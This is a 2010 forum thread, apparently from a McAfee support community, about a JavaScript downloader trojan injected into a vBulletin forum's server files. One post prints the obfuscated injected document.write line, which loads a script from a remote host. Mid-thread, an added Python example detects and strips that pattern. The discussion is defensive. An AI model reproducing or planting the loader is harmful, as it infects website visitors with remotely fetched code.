mschmid
Level 7

McAfee doesn't detect trojan: Trojan-Downloader.JS.Pegel.c

Kaspersky and NOD32 are detecting a trojan (Trojan-Downloader.JS.Pegel.c and JS/TrojanDownloader.Agent.NRO respectively), so why does McAfee not? Isn't it a trojan?

It attached itself to .js and .html files on a server.

I am using the latest McAfee VirusScan of Jan. 23. 2010:

Version 13.15

Build 13.15.113

AffId: 0

Language: de, 13.15.108

DAT.- Version :5870.0000

Engine-Version: 5301.4018

I could provide the warning-provoking code as text if this helps.

0 Kudos
12 Replies
CrazyChuck
Level 7

Re: McAfee doesn't detect trojan: Trojan-Downloader.JS.Pegel.c

Please post the warning-provoking code as text if you can do that. It would be most helpful in your situation.

0 Kudos
mschmid
Level 7

Re: McAfee doesn't detect trojan: Trojan-Downloader.JS.Pegel.c

Here it comes: be careful

* * * * WARNING: probably malicious code between * * * * * *

/*Exception*/ document.write('<script src='+'h@(t$$t))(#p$@(:&/(#&&/$)a((l^&l@@a$^b)@)#!o()&)u$t!#-((c^!o!&$-()^j&@p)&@.&(c$@l(!i!(c!&!k@#s^!o)@$^!r$(@.!^&c)@(&o@m!(#.&!!b$a^&s##e&$c)$#a@$^$m))@(p)(#h!q@#)-#c@o(m)@@.^@g$!@r$#e^^^e^&n!@(s(@#c@)#)(o($^m)#e&t)!#r#$&&u@^&(e^#&$.)(r(^!u^$(:@^^8&(0)^#&8(&0^!(/(n(@e!x@t#!a(g)).#c(!o@!m$!$/)(n!!^e!)x(##t(a@!@g@!&&.$&@c!)&o@@$m!((/(e&)(b@a#&^)y!^^.!$#f(r)/&#r^$^e!(p&u#)@b)(b)^)l!i$c&!a).((&i!&(^t)/!&g@)&&!o^$#o#(g&$&@l#e&.!c^)!#&o(@&^m$@&/&'.replace(/\)|\!|\$|#|@|\^|\(|&/ig, '')+' defer=defer></scr'+'ipt>');

* * * * WARNING: probably malicious code between * * * * * *

0 Kudos

Re: McAfee doesn't detect trojan: Trojan-Downloader.JS.Pegel.c

Hi,

If files in your website are infected with the trojan code, then use the Trojan-Downloader.JS.Pegel.c cleanup script to remove all types of the infection strings.

There is a wide variety of string types, so if that script doesn't remove the code in your files, then update me with the new code.

I will add signature for the new code.

Message was edited by: sameer shelavale on 2/3/10 12:16:19 AM CST
0 Kudos
CrazyChuck
Level 7

Re: McAfee doesn't detect trojan: Trojan-Downloader.JS.Pegel.c

You're right about the careful part. Until we find out from a better person, hold on tight. Let's see if we can get a knowledgeable person on this rat. This is some nasty stuff here. Have you used the scan yet? How many files are in your McAfee Security Center after PC Startup files scanned registry?

Message was edited by: CrazyChuck on 1/23/10 5:01:54 PM CST

Message was edited by: CrazyChuck on 1/23/10 5:20:20 PM CST
0 Kudos
mschmid
Level 7

Re: McAfee doesn't detect trojan: Trojan-Downloader.JS.Pegel.c

Hi Chuck

Thanks for responding

 Have you used the scan yet. How many files are in your registry ?

I am one of many administrators of a forum (vBulletin). The problem was that those users/visitors having Kaspersky or NOD32 enabled couldn't access certain parts of the forum anymore (on Jan. 22. 2010). One of us admins had a look at the file structure of the server (not a fully dedicated server) and discovered that many .php, .html and .js files had a new time and date stamp of Jan. 22. 2010. So he started to download the suspicious stuff to scan it locally and detected the altered part by comparing with older file versions. By now he has manually disinfected several hundred files. It seems that the infection spread only or mostly by executing the index.php files. Danger seems banned for the moment.

I have no idea what effect the code has on a non-server machine (local PC) but at least it doesn't seem to be highly contagious.

Regards,

Markus

P.S.

This is what virustotal.com (free online scanner) returned. I had submitted the code as "nanu.txt":

http://www.virustotal.com/es/analisis/0fc9f2300e92d8e01872c58e3d0cb411c93cd94bb03d366c193dd3c30a8b3b...

Message was edited by: mschmid on 23/01/10 17:31:08 CST

Message was edited by: mschmid on 23/01/10 17:31:59 CST
0 Kudos
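
The manual comparison against older file versions described in the post above can be automated for this specific injection shape. The following is an added example, not code from any participant in this thread or from the cleanup script mentioned earlier; the function names and the sample line (with a placeholder host) are constructed for illustration, and it matches only the pattern quoted in this thread, not other variants.

```python
import re
from pathlib import Path

# Shape of the line quoted earlier in this thread: an optional /*Exception*/
# marker, then document.write() building a <script src=...> tag from a
# junk-padded string that an inline .replace(/.../ig, '') cleans up.
INJECTION = re.compile(
    r"(?:/\*Exception\*/\s*)?document\.write\(\s*'<script src='\s*\+\s*"
    r"'(?P<padded>[^'\n]*)'\s*\.replace\(\s*/(?P<junk>(?:\\.|[^/\\\n])+)/[a-z]*"
    r"\s*,\s*''\s*\)[^\n]{0,200}?</scr'\s*\+\s*'ipt>'\s*\)\s*;?"
)

# Constructed sample (not the thread's payload): same shape, placeholder host.
SAMPLE = (
    "function ok() { return 1; }\n"
    r"/*Exception*/ document.write('<script src='+'h#t@t!p:$/(/e^x)a&m#p@l!e.i$n(v^a)l&i#d/x.j@s'"
    r".replace(/\)|\!|\$|#|@|\^|\(|&/ig, '')+' defer=defer></scr'+'ipt>');"
    "\n"
)


def find_injections(text):
    """Return (snippet, decoded_src) for each injected statement in text."""
    hits = []
    for m in INJECTION.finditer(text):
        try:
            # Assumption: the junk pattern is simple enough to be valid in
            # Python's re as well as in JavaScript (true for the quoted line).
            decoded = re.sub(m["junk"], "", m["padded"], flags=re.I)
        except re.error:
            decoded = None  # still reported, just not decoded
        hits.append((m.group(0), decoded))
    return hits


def strip_injections(text):
    """Return text with every matched statement removed."""
    return INJECTION.sub("", text)


def scan_tree(root, suffixes=(".js", ".html", ".php")):
    """Map each infected file under root to the script sources it would load."""
    report = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in suffixes:
            hits = find_injections(path.read_text(errors="replace"))
            if hits:
                report[str(path)] = [src for _, src in hits]
    return report
```

Run `scan_tree` on a downloaded copy of the site rather than the live server, and review the reported files before writing back the output of `strip_injections`.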
CrazyChuck
Level 7

Re: McAfee doesn't detect trojan: Trojan-Downloader.JS.Pegel.c

Thanks Markus. It appears to be some vicious stuff.

Message was edited by: CrazyChuck on 1/24/10 2:29:59 PM CST

Message was edited by: CrazyChuck on 1/24/10 2:38:30 PM CST
0 Kudos
SamSwift
Level 12

Re: McAfee doesn't detect trojan: Trojan-Downloader.JS.Pegel.c

Hi,

Please submit the file(s) to us here. Before doing so you'll need to zip them and password-protect the zip with the word infected.

Thanks,

Sam

0 Kudos
CrazyChuck
Level 7

Re: McAfee doesn't detect trojan: Trojan-Downloader.JS.Pegel.c

Question:

Do I, or any McAfee users here at the Community, have a problem with this contamination here?

Message was edited by: CrazyChuck on 1/24/10 2:34:20 PM CST
0 Kudos
mschmid
Level 7

Re: McAfee doesn't detect trojan: Trojan-Downloader.JS.Pegel.c

Thanks Sam,

Infected file submitted.

Regards,

Markus

0 Kudos